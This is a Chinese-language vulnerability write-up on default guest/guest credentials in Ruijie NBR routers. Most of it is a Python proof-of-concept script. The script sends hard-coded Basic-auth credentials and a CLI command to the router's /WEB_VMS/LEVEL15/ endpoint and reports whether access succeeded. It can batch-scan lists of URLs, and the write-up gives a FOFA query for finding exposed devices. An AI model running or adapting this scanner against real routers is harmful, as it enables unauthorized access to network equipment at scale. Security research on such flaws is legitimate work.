漏洞简介
锐捷网络股份有限公司是一家数据通信解决方案提供商。
锐捷网络股份有限公司NBR路由器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。
漏洞影响
NBR路由器
漏洞复现
百度上查询到NBR路由器的默认账号密码为guest/guest
在NBR后台管理界面使用默认账号密码成功登录后台
poc
import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告 import sys import argparse def lemonlove7(): print('FOFA:title="锐捷网络--NBR路由器--登录界面"') print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx') print('python xxx.py -f/--file xxx.txt') print('lemonlove7') if len(sys.argv) == 1: lemonlove7() sys.exit() par = argparse.ArgumentParser(description='lemonlove7 help') par.add_argument('-u','--url' ,help='输入url',default='') par.add_argument('-f','--file',help='输入文件',default='') a = par.parse_args() url =a.url file =a.file headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36', 'Content-Type':'text/plain;charset=UTF-8', 'Cookie':'c_name=; hardtype=NBR2000G; web-coding=gb2312; currentURL=; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest', 'Authorization':'Basic Z3Vlc3Q6Z3Vlc3Q=' } data = 'command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.' if url != '': url = url url2 =url try: url1 =url+'/WEB_VMS/LEVEL15/' r =requests.post(url=url1 , data=data,headers=headers,verify=False,timeout=10) #print(r.text) if r.status_code == 200 and 'WebCLI' in r.text: print(url2+'NBR路由器存在弱口令:guest/guest') else: print(url2+'NBR路由器不存在弱口令') except Exception as e: print(url2+'异常') if file != '': p = open(file,'r+') for i in p.readlines(): url = i.strip() if url.startswith('http://') != 1 and url.startswith('https://') != 1: url = 'http://'+url url=url url1=url #print(url) try: url = url +'/WEB_VMS/LEVEL15/' r=requests.post(url=url,headers=headers,data=data,verify=False,timeout=10) if r.status_code == 200 and 'WebCLI' in r.text: print(url1+'NBR路由器存在弱口令:guest/guest') else: print(url1+'NBR路由器不存在弱口令') except Exception as e: print(url1+'异常')
运行效果如下:
单个检测:
批量检测:
